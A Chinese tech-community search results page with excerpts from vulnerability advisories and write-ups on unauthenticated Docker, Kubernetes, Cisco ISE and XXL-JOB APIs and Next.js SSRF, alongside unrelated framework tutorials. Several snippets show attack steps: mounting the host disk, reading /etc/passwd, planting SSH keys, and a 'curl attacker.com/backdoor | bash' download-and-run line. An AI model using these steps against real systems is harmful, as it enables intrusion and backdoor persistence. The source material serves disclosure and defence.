首页
学习
活动
专区
圈层
工具
发布

Docker API未授权命令执行

Docker Swarm使用标准的Docker API通过2375端口来管理每个Docker节点,Docker API是一个取代远程命令行界面(RCLI)的REST API。...当Docker节点的2375端口直接暴露并未做权限检查时,存在未授权访问漏洞,攻击者可以利用Docker API执行任何操作,包括执行Docker命令,创建、删除Docker以及获得宿主机权限等。...漏洞复现 访问目标的2375端口如下接口,若有信息,则存在Docker API未授权访问 http://x.x.x.x:2375/version http://x.x.x.x:2375/images http...我们可以执行如下命令启动一个未开启的容器,然后将宿主机的磁盘挂载到容器中。...chroot /opt bash#然后就可以执行如下一些命令,但是查看的ip和反弹shell等一些命令,还是容器内的historycat /etc/passwd 写入SSH公钥 执行如下命令将本地的authorized_keys

3.9K20

【漏洞通报】Cisco ISE API 未授权远程代码执行漏洞

漏洞情况近期,火山信安实验室监测发现, Cisco Identity Services Engine (ISE) 的 REST API 接口存在高危安全漏洞(CVE-2025-20281,CVSS v3.1...该漏洞源于 ISE 未对特定 API 端点实施身份验证和授权检查,攻击者无需任何凭证即可通过构造恶意 HTTP 请求,直接在受影响设备上执行任意操作系统命令,导致完全系统控制。...0x01漏洞利用方式攻击者可通过向 CSE ISE 管理接口的未公开 API 端点(如 /ers/config/networkdevice/ 或 /admin/API/mnt/Session/,具体路径需结合实际环境探测...或分号拼接 ; 实现无交互执行);一旦命令触发,攻击者可进一步利用该漏洞下载并执行恶意二进制文件(例如通过 curl http://attacker.com/backdoor | bash 植入后门),...Cisco ISE 3.2.2 及以上启用 Cisco ISE 多因素认证(MFA),强制管理员使用硬件令牌或生物识别登录定期审计 ISE 日志(/var/log/ise/ers.log),监控异常 API

45210
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    利用Next.js中间件漏洞实现SSRF攻击与RCE

    NoSQL注入在位于/src/app/api/auth/register/route.ts的注册API端点中,我们可以在第20行注意到原始用户输入直接连接到MongoDB查询中。...NextJS中间件我们的下一个主要关注点是middleware.ts文件。这个位于/src/middleware.ts的特殊文件允许开发人员在返回响应之前运行代码。...中间件配置错误除了安全头之外,中间件似乎还执行一些分析功能。以下代码片段检查是否存在UTM参数之一。当满足此条件时,将返回带有请求头的完整响应。...利用NextJS中间件中的SSRF服务器端请求伪造漏洞允许攻击者代表易受攻击的应用程序、服务或服务器请求外部资源。...命令执行复制以下请求将在系统上执行whoami:POST /?

    42510

    漏洞研究(7):XXL-JOB执行器未授权访问漏洞(RESTful API)

    原理与危害 调度中心使用RESTful API对执行器进行调度通信时,可以使用accessToken向执行器证明自己的身份。...如果没有配置accessToken,任何人都能对执行器发起调度通信,对执行器所在的服务器进行任意命令执行,从而获得执行器所在服务器的权限。 3....加固措施 可参考XXL-JOB作者恨铁不成钢的防护建议:XXL JOB 未授权访问致远程命令执行 "漏洞" 声明 5.1 开启身份认证 配置accessToken,开启身份认证,调度中心和执行器的值需保持一致...xxl-job-executor-samples/xxl-job-executor-sample-springboot/target/xxl-job-executor-sample-springboot-2.2.0.jar 再次对执行器进行未授权任意代码执行...CentOS中) yum install iptables-services -y && service iptables save && systemctl enable iptables 再次对执行器进行未授权任意代码执行

    5.5K10

    如何在 Next.js 全栈应用程序中无缝实现身份验证

    npm install @clerk/nextjs 接下来需要创建一个 Clerk 账户和新项目,获取要用到的 API 密钥。...为此,我们需要在 /src/middleware.ts 中创建一个新的中间件,内容如下: import { authMiddleware } from "@clerk/nextjs"; export default...但现在中间件已经设置完毕,我们可以修改 /src/app/page.tsx 文件来更改此中间件: import { UserButton, currentUser } from '@clerk/nextjs...但全栈应用程序还有后端部分,为此我们将在新的 App Router 模式中使用 /src/app/api/route.ts 文件,借此在 GET/api 处创建一个后端端点: import { auth...而如果用户成功通过了身份验证,接下来就是设置用户能在端点上进行的操作了。我们可以访问 userId,据此将数据库中的数据引用给用户。

    3.3K20

    【前端安全】CVE-2026-44578:Next.js SSRF 漏洞深度解析与修复实战指南

    漏洞深度解析与修复实战指南摘要:2026年5月,Vercel紧急披露Next.js高危SSRF漏洞(CVE-2026-44578),攻击者可通过特制WebSocket升级请求实施服务端请求伪造,暴露内网服务和云元数据端点...攻击者利用SSRF漏洞扫描内网端口,发现未授权访问的MongoDB实例(默认端口27017),直接导出10万+用户敏感数据。...:Sec-WebSocket-Protocol头部可直接指定任意URL✅未限制协议:允许连接到http://、https://、ws://、wss://等所有协议✅未过滤内网:未阻止访问10.0.0.0...(如果有)□图片优化(/api/_next/image)是否正常?□ISR/SSR页面渲染是否正确?□中间件(middleware.ts)是否生效?□国际化(i18n)路由是否正常?...定期渗透测试✅持续:建立DevSecOps流程,自动化漏洞检测⚠️其他相关漏洞提醒本次Vercel安全公告还修复了多个高危漏洞,建议一并处理:CVE-2026-44573:PagesRouteri18n中间件绕过影响

    1.3K11

    云上攻防-云原生篇&Kubernetes&K8s安全&API&Kubelet未授权访问&容器执行

    也打开了新的入侵路径,例如: 1、通过虚拟机攻击云管理平台,利用管理平台控制所有机器 2、通过容器进行逃逸,从而控制宿主机以及横向渗透到K8s Master节点控制所有容器 3、利用KVM-QEMU/执行逃逸获取宿主机...Server未授权访问&kubelet未授权访问复现 k8s集群环境搭建 搭建环境使用3台Centos 7,参考: https://www.jianshu.com/p/25c01cae990c https...Server未授权访问 旧版本的k8s的API Server默认会开启两个端口:8080和6443。...-连接判断pods kubectl --insecure-skip-tls-verify -s https://10.10.10.167:6443 get pods 用户名密码随便输 -连接执行...namespace default pod whgojp container test-container -执行模版: curl -XPOST -k "https://10.10.10.170

    1.2K10

    EdgeOne Makers Skills 深度实战:用一句话完成全栈部署

    传统流程需要5步+15分钟,使用Skills只需一句话:展开代码语言:BashAI代码解释#在AI对话中说出(或者粘贴到Cursor/ClaudeCode的对话窗口):"帮我把当前目录下的nextjs-blog.../nextjs-blog部署耗时:23秒3.DevSkill实战:自然语言驱动的API开发场景:用一句话创建数据查询API展开代码语言:BashAI代码解释#在AI中说:"帮我写一个EdgeFunction...-生成增量迁移SQL4.执行迁移-在测试环境执行dry-run-确认后执行生产环境迁移5.验证-执行验证查询确认迁移成功-输出迁移报告###异常处理-连接失败:检查网络和凭证,重试3次-冲突检测:提示开发者手动解决后重试...端点开发15min/个2min/个87%代码缺陷率5.2%2.1%60%首次通过率68%85%25%开发体验评分6.5/109.2/1042%最佳实践1.Skills提示词优化展开代码语言:BashAI...调用返回401,原因是环境变量未正确注入。

    30510

    htmx,它到底是框架还是库?

    但我们还是可以尝试去区分它们: 库(Library):这是一种API对应用程序其他部分影响不大的第三方代码。 框架(Framework):这种代码的API则决定了应用程序的整体结构。...比如,一个使用了CSV解析库的JavaScript服务可以相对容易地更换另一个CSV解析库;但如果是使用了NextJS这样的框架,服务可能就会在整个生命周期中依赖于NextJS,因为大量代码都是基于与NextJS...当你在项目中使用htmx时,你会在HTML中包含htmx的属性(比如hx-post,hx-target),编写以htmx格式化数据(带有特定请求头)来调用的端点,并从这些端点返回htmx期望的格式化数据...同样地,你也可以编写一个跨多个不同客户端重用的端点,但更简单的做法是将你的数据和超媒体API分离到不同的URL。是的,htmx可以作为库使用,但让它成为你的框架可能会更好。...虽然许多htmx用户喜欢用JSX来渲染API响应,但htmx与传统的模板引擎兼容性良好,可以轻松移植到任何语言。

    1K10

    我用 WorkBuddy 给一个海外 SaaS 平台做了一次完整黑盒渗透测试,发现了 6 个安全漏洞

    WorkBuddy的解决方式:自动检测到错误后,执行了playwrightinstall-deps并重试,整个过程无需我手动干预。...4.2高危发现:用户枚举漏洞通过对比已注册邮箱和未注册邮箱的API响应,WorkBuddy精准定位了一个用户枚举漏洞:漏洞细节:端点:POST/api/auth.loginWithEmail?...4.3中危发现:OTP验证无频率限制漏洞:verifyOtp端点未对验证码尝试次数做任何限制。...把整个过程打包成了一个可复用的Python工具集:展开代码语言:BashAI代码解释D:\黑盒子\tools\├──blackbox_lib.py#核心库(HTTP客户端、响应分析器、攻击载荷库)├──nextjs_fingerprint.py...请勿将文中技术用于未授权的渗透测试。

    31210

    前端全栈进阶 Nextjs打造跨框架SaaS应用-慕fx

    Nextjs介绍 Next.js 是一个由 Vercel 开发的开源 React 框架,用于构建服务端渲染(SSR)和静态网站生成(SSG)的应用程序。...API 路由: Next.js 提供了一种简单的方法来创建 API 路由,可以在同一个项目中处理前端和后端逻辑。...类型安全的 API 调用tRPC 提供了一种方式来定义和调用远程过程调用(RPC),并且这些调用是完全类型安全的。...前端全栈进阶 Nextjs打造跨框架SaaS应用透明的错误处理tRPC 提供了类型安全的错误处理机制,确保错误可以在类型系统中被捕获和处理。...扩展性和中间件支持tRPC 支持中间件,使得可以在请求处理过程中添加额外的逻辑,例如认证、日志记录等。这些中间件同样是类型安全的。

    1.4K10

    蓝军技巧之SSRF利用方法

    利用SSRF攻击传统的组件、CMS等的常用途径不再赘述,这里举一些在大部分互联网公司中常用的 能够被SSRF进一步利用的中间件。...通过内网Eruaka未授权,可获取到大量注册的应用,若运气好,直接可定位到核心组件和核心服务。 2.3 JumpServer 利用点: RCE: JumpServer远程代码执行漏洞。...比如常见的:API Server / etcd / kubectl proxy / kubelet / Docker Remote API / dashboard等等等 2.6 大数据相关 利用点: 未授权访问...2.7 SpringBoot Actuator 利用点: 未授权访问: 很多Actuator的端点拦截只是对外网而言,有些是在Nginx过滤了 或者在 filter设置的只允许内部网络访问,通过SSRF...结合未授权 Apache Druid 命令执行漏洞(CVE-2021-25646) 2.13 APISIX 利用点: 未授权访问 CVE-2021-45232 APISIX Dashboard未授权访问漏洞

    3.2K41
    领券